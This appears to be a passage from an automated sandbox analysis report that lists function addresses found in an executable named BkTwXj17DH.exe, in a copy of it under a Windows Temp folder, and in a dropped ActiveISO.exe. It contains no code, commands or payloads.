Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004F03D5	0_2_004F03D5
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004FA560	0_2_004FA560
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004F07AA	0_2_004F07AA
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004CA8F1	0_2_004CA8F1
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004FAA0E	0_2_004FAA0E
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004F0B6F	0_2_004F0B6F
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004EFB89	0_2_004EFB89
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004F2C18	0_2_004F2C18
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004F2E47	0_2_004F2E47
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004FEE7C	0_2_004FEE7C
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D8001D	2_2_00D8001D
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D741EA	2_2_00D741EA
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D562AA	2_2_00D562AA
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D803D5	2_2_00D803D5
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D7C332	2_2_00D7C332
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D8A560	2_2_00D8A560
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D807AA	2_2_00D807AA
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D5A8F1	2_2_00D5A8F1
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D8AA0E	2_2_00D8AA0E
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D7FB89	2_2_00D7FB89
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D80B6F	2_2_00D80B6F
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D82C18	2_2_00D82C18
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D82E47	2_2_00D82E47
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D8EE7C	2_2_00D8EE7C
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_6FFF3790	2_2_6FFF3790
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_6FFFB745	2_2_6FFFB745
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_700060C4	2_2_700060C4
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_700061E4	2_2_700061E4
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_700042F4	2_2_700042F4
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_6FFFC320	2_2_6FFFC320
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_70000DB9	2_2_70000DB9
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_6FFF89D5	2_2_6FFF89D5
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_70000690	2_2_70000690
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90EBE0	3_2_00007FF72A90EBE0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A958CC0	3_2_00007FF72A958CC0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A944CA0	3_2_00007FF72A944CA0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A92CC90	3_2_00007FF72A92CC90
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A928C60	3_2_00007FF72A928C60
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A91E9A0	3_2_00007FF72A91E9A0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A918A00	3_2_00007FF72A918A00
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A93AA00	3_2_00007FF72A93AA00
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A956A10	3_2_00007FF72A956A10
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A950B10	3_2_00007FF72A950B10
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A910AE0	3_2_00007FF72A910AE0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A904A90	3_2_00007FF72A904A90
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A92AFC0	3_2_00007FF72A92AFC0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A918FF0	3_2_00007FF72A918FF0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A91AF40	3_2_00007FF72A91AF40
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A93EF40	3_2_00007FF72A93EF40
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A92D0B0	3_2_00007FF72A92D0B0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A941030	3_2_00007FF72A941030
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A957030	3_2_00007FF72A957030
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A942DC0	3_2_00007FF72A942DC0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A926DA0	3_2_00007FF72A926DA0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A902D30	3_2_00007FF72A902D30
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A9523D0	3_2_00007FF72A9523D0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A94E3D0	3_2_00007FF72A94E3D0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A94C500	3_2_00007FF72A94C500
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A914440	3_2_00007FF72A914440
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A958430	3_2_00007FF72A958430
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90A140	3_2_00007FF72A90A140
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A93A250	3_2_00007FF72A93A250
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A956260	3_2_00007FF72A956260
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A916810	3_2_00007FF72A916810
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A918720	3_2_00007FF72A918720
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A9208C0	3_2_00007FF72A9208C0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A9148A0	3_2_00007FF72A9148A0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A93E850	3_2_00007FF72A93E850
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A954830	3_2_00007FF72A954830
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A948880	3_2_00007FF72A948880
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A926890	3_2_00007FF72A926890
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A9205C0	3_2_00007FF72A9205C0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A9085A0	3_2_00007FF72A9085A0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A9426F7	3_2_00007FF72A9426F7
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A91C700	3_2_00007FF72A91C700
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90A620	3_2_00007FF72A90A620
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A922660	3_2_00007FF72A922660
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A947BC0	3_2_00007FF72A947BC0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A937BB0	3_2_00007FF72A937BB0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A92BC00	3_2_00007FF72A92BC00
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A905B30	3_2_00007FF72A905B30
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90DB34	3_2_00007FF72A90DB34
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90DB5B	3_2_00007FF72A90DB5B
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90D9BC	3_2_00007FF72A90D9BC
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A95B9B0	3_2_00007FF72A95B9B0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90D9F6	3_2_00007FF72A90D9F6
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90D938	3_2_00007FF72A90D938
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A925980	3_2_00007FF72A925980
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90D982	3_2_00007FF72A90D982
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A945990	3_2_00007FF72A945990
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A927960	3_2_00007FF72A927960
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90D964	3_2_00007FF72A90D964
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90DAD6	3_2_00007FF72A90DAD6
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90DAB0	3_2_00007FF72A90DAB0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A911B00	3_2_00007FF72A911B00
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90DB0B	3_2_00007FF72A90DB0B
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A943AF0	3_2_00007FF72A943AF0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90DA48	3_2_00007FF72A90DA48
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90DA1C	3_2_00007FF72A90DA1C
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90DA82	3_2_00007FF72A90DA82
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A915A70	3_2_00007FF72A915A70
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A917FD0	3_2_00007FF72A917FD0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A915FA0	3_2_00007FF72A915FA0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A927FF0	3_2_00007FF72A927FF0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A929F20	3_2_00007FF72A929F20
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A905F60	3_2_00007FF72A905F60
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A9140A0	3_2_00007FF72A9140A0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A924050	3_2_00007FF72A924050
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A93BDD0	3_2_00007FF72A93BDD0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A901D30	3_2_00007FF72A901D30
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A939D30	3_2_00007FF72A939D30
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A945E30	3_2_00007FF72A945E30
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A9333E0	3_2_00007FF72A9333E0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A9574C0	3_2_00007FF72A9574C0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A93D4F0	3_2_00007FF72A93D4F0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A94B1A0	3_2_00007FF72A94B1A0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90D140	3_2_00007FF72A90D140
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A93D187	3_2_00007FF72A93D187
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A91D220	3_2_00007FF72A91D220
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A925260	3_2_00007FF72A925260
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A929750	3_2_00007FF72A929750
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A955750	3_2_00007FF72A955750
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A93D790	3_2_00007FF72A93D790
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A94D790	3_2_00007FF72A94D790
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90D8CE	3_2_00007FF72A90D8CE
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90D8A0	3_2_00007FF72A90D8A0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90D912	3_2_00007FF72A90D912
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A9138F0	3_2_00007FF72A9138F0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90D8F4	3_2_00007FF72A90D8F4
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90D848	3_2_00007FF72A90D848
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A90D866	3_2_00007FF72A90D866
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A93B5C0	3_2_00007FF72A93B5C0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A93F6C0	3_2_00007FF72A93F6C0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA304AD0	3_2_00007FFBAA304AD0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA2EEB40	3_2_00007FFBAA2EEB40
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA30AB20	3_2_00007FFBAA30AB20
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA305BC0	3_2_00007FFBAA305BC0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA3028F0	3_2_00007FFBAA3028F0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA2EC920	3_2_00007FFBAA2EC920
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA31AA0C	3_2_00007FFBAA31AA0C
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA306A48	3_2_00007FFBAA306A48
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA2EDA20	3_2_00007FFBAA2EDA20
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA304F10	3_2_00007FFBAA304F10
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA312FF0	3_2_00007FFBAA312FF0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA2FAFA0	3_2_00007FFBAA2FAFA0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA2F6070	3_2_00007FFBAA2F6070
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA2EFCD0	3_2_00007FFBAA2EFCD0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA314D00	3_2_00007FFBAA314D00
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA300D40	3_2_00007FFBAA300D40
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA319D38	3_2_00007FFBAA319D38
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA31BE28	3_2_00007FFBAA31BE28
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA3012A0	3_2_00007FFBAA3012A0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA3072FC	3_2_00007FFBAA3072FC
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA2F63C8	3_2_00007FFBAA2F63C8
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA2F93A0	3_2_00007FFBAA2F93A0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA2FE430	3_2_00007FFBAA2FE430
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA2FC110	3_2_00007FFBAA2FC110
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA320156	3_2_00007FFBAA320156
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA2FD280	3_2_00007FFBAA2FD280
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA2F26A0	3_2_00007FFBAA2F26A0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA2F6748	3_2_00007FFBAA2F6748
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA2F9850	3_2_00007FFBAA2F9850
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA3134F8	3_2_00007FFBAA3134F8
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA2EB4B8	3_2_00007FFBAA2EB4B8
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA3154D0	3_2_00007FFBAA3154D0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA31C520	3_2_00007FFBAA31C520
